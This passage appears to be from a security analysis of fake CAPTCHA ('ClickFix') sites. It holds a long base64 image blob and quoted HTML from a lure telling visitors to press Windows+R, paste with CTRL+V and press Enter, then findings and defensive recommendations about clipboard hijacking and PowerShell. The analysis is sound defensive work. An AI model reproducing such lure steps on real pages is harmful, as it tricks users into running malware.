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' alt='Windows Logo' style='width:25px; height:25px; vertical-align:middle;'> + R </li> <li>Press CTRL + V</li> <li>Press Enter</li> </ul> </div> </div> </main>... function verifyCaptcha() { <p class="fkrc-im-not-a-robot fkrc-m-p fkrc-line-normal">I'

Attack Pattern Reconstruction

Key Findings

  1. Prevalence: 11.1% of analyzed sites contained malicious content
  2. Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
  3. Target Platform: Windows systems via PowerShell execution
  4. Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA

Recommendations

  1. User Education: Warn users about fake CAPTCHA verification schemes
  2. Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
  3. URL Filtering: Block known malicious domains identified in this analysis
  4. PowerShell Execution Policy: Restrict PowerShell execution in corporate environments